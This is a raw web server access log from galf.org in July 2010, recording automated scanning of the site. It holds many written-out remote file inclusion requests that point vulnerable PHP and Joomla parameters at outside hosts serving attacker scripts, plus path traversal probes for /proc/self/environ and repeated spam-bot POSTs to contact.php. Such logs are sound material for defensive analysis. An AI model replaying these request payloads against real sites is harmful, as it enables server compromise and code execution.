91.137.131.51 - - [25/Jul/2010:21:49:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:21:49:57 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:21:49:57 -0700] "POST /logs/access_100621.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:21:49:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:21:49:57 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:21:49:58 -0700] "POST /logs/access_100621.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:21:49:58 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:21:49:58 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:21:49:58 -0700] "POST /logs/access_100621.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:21:50:20 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:21:50:20 -0700] "GET /logs/access_100201.log%20%20//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:21:50:21 -0700] "GET /appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:21:51:01 -0700] "GET /logs/access_091102.log%20%20//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:21:51:04 -0700] "GET /logs/access_100621.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:21:51:41 -0700] "GET /logs/access_100201.log%20%20//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:21:52:43 -0700] "GET /logs/access_091102.log%20%20//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:21:53:10 -0700] "GET /logs/access_091228.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:21:53:10 -0700] "GET /logs/access_090928.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:21:54:07 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:21:54:07 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:21:54:07 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:21:54:08 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:21:54:08 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:21:54:08 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:21:54:08 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:21:54:08 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:21:54:08 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:21:54:08 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:21:54:08 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:21:54:08 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
66.249.65.179 - - [25/Jul/2010:22:00:07 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "galf.org"
83.243.9.110 - - [25/Jul/2010:22:00:55 -0700] "GET /bbs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:00:56 -0700] "GET /logs//bbs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:00:56 -0700] "GET /logs/access_100628.log%20%20//bbs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.245 - - [25/Jul/2010:22:00:59 -0700] "GET /?S=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:01:08 -0700] "GET /bbs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:01:08 -0700] "GET /logs//bbs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:01:08 -0700] "GET /logs/access_100628.log%20%20//bbs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.52.11 - - [25/Jul/2010:22:03:18 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
62.141.52.11 - - [25/Jul/2010:22:03:18 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
62.141.52.11 - - [25/Jul/2010:22:03:18 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
211.236.43.200 - - [25/Jul/2010:22:04:41 -0700] "GET /logs//bbs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.236.43.200 - - [25/Jul/2010:22:04:41 -0700] "GET /bbs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.236.43.200 - - [25/Jul/2010:22:04:41 -0700] "GET /logs/access_100628.log%20%20//bbs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.158.144.27 - - [25/Jul/2010:22:04:49 -0700] "GET /logs/access_100412.log HTTP/1.1" 200 10005453 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "galf.org"
67.195.115.245 - - [25/Jul/2010:22:04:50 -0700] "GET /?S=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
119.192.145.144 - - [25/Jul/2010:22:05:06 -0700] "GET /logs/access_100308.log%20%20/index.php?nic=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.192.145.144 - - [25/Jul/2010:22:05:06 -0700] "GET /index.php?nic=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.192.145.144 - - [25/Jul/2010:22:05:06 -0700] "GET /logs/index.php?nic=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.192.145.144 - - [25/Jul/2010:22:05:18 -0700] "GET /logs/access_090914.log%20%20/index.php?nic=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.236.43.200 - - [25/Jul/2010:22:06:39 -0700] "GET /logs//appserv/main.php?appserv_root=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.236.43.200 - - [25/Jul/2010:22:06:39 -0700] "GET /appserv/main.php?appserv_root=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.205.159 - - [25/Jul/2010:22:07:34 -0700] "GET /logs/access_090928.log/index.php?option=com_datsogallery&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.205.159 - - [25/Jul/2010:22:07:34 -0700] "GET /logs/index.php?option=com_datsogallery&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.205.159 - - [25/Jul/2010:22:07:35 -0700] "GET /index.php?option=com_datsogallery&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.205.159 - - [25/Jul/2010:22:07:37 -0700] "GET /index.php?option=com_datsogallery&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.205.159 - - [25/Jul/2010:22:07:37 -0700] "GET /logs/index.php?option=com_datsogallery&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.205.159 - - [25/Jul/2010:22:07:37 -0700] "GET /logs/access_090928.log/index.php?option=com_datsogallery&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.205.159 - - [25/Jul/2010:22:07:38 -0700] "GET /logs/access_090928.log/index.php?option=com_datsogallery&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.205.159 - - [25/Jul/2010:22:07:38 -0700] "GET /index.php?option=com_datsogallery&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.205.159 - - [25/Jul/2010:22:07:38 -0700] "GET /logs/index.php?option=com_datsogallery&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:08:15 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:08:16 -0700] "GET /logs/access_100118.log%20%20//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:08:16 -0700] "GET /appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:08:23 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:08:23 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:08:23 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:08:23 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:08:23 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:08:23 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:08:23 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:08:23 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:08:23 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:08:23 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:08:23 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:08:23 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:08:24 -0700] "GET /appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:08:24 -0700] "GET /logs/access_100118.log%20%20//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:08:24 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:09:35 -0700] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.42.216.165 - - [25/Jul/2010:22:09:49 -0700] "GET /logs/access_100531.log/?_PHPLIB[libdir]=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
93.42.216.165 - - [25/Jul/2010:22:09:50 -0700] "GET /?_PHPLIB[libdir]=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.834" "www.galf.org"
93.42.216.165 - - [25/Jul/2010:22:09:50 -0700] "GET /logs//?_PHPLIB[libdir]=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 200 7664 "-" "libwww-perl/5.834" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:09:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:09:54 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:09:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:09:55 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:09:55 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:09:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:09:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:09:55 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:09:55 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:09:55 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:09:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
92.53.113.3 - - [25/Jul/2010:22:09:55 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.galf.org"
87.98.217.83 - - [25/Jul/2010:22:10:32 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
87.98.217.83 - - [25/Jul/2010:22:10:32 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
87.98.217.83 - - [25/Jul/2010:22:11:35 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
87.98.217.83 - - [25/Jul/2010:22:11:35 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:11:38 -0700] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.168.226.100 - - [25/Jul/2010:22:11:42 -0700] "GET /index.php?option=com_datsogallery&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.168.226.100 - - [25/Jul/2010:22:11:46 -0700] "GET /logs/index.php?option=com_datsogallery&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.168.226.100 - - [25/Jul/2010:22:11:49 -0700] "GET /logs/access_090928.log/index.php?option=com_datsogallery&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.236.43.200 - - [25/Jul/2010:22:12:01 -0700] "GET /appserv/main.php?appserv_root=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.236.43.200 - - [25/Jul/2010:22:12:01 -0700] "GET /logs//appserv/main.php?appserv_root=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.236.43.200 - - [25/Jul/2010:22:12:02 -0700] "GET /logs/access_100118.log%20%20//appserv/main.php?appserv_root=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:12:30 -0700] "GET /logs/access_091109.log//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.245 - - [25/Jul/2010:22:13:36 -0700] "GET /logs/access_091214.log HTTP/1.0" 200 7250807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:22:13:37 -0700] "GET ///include/bbs.lib.inc.php?site_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:22:13:37 -0700] "GET /logs/access_100628.log%20%20////include/bbs.lib.inc.php?site_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:22:13:38 -0700] "GET /logs////include/bbs.lib.inc.php?site_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:22:13:39 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:22:13:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:22:13:39 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:22:14:10 -0700] "POST /contact.php HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:22:14:10 -0700] "POST /logs//contact.php HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:22:14:11 -0700] "POST /logs/access_090928.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:14:16 -0700] "GET /logs/access_090928.log//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:22:14:58 -0700] "GET /logs/access_090921.log//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:22:15:24 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:22:15:53 -0700] "GET /logs/access_100705.log%20%20////include/bbs.lib.inc.php?site_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:22:17:24 -0700] "GET /logs/access_100628.log////include/bbs.lib.inc.php?site_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:54 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:54 -0700] "POST /logs/access_100705.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:54 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:54 -0700] "POST /logs/access_100705.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:54 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:55 -0700] "POST /logs/access_100705.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:55 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:55 -0700] "POST /logs/access_100705.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:58 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:58 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:58 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:22:17:59 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
211.236.43.200 - - [25/Jul/2010:22:18:08 -0700] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:22:19:13 -0700] "GET /logs/access_091116.log////include/bbs.lib.inc.php?site_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:22:19:13 -0700] "GET /logs/access_100118.log////include/bbs.lib.inc.php?site_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
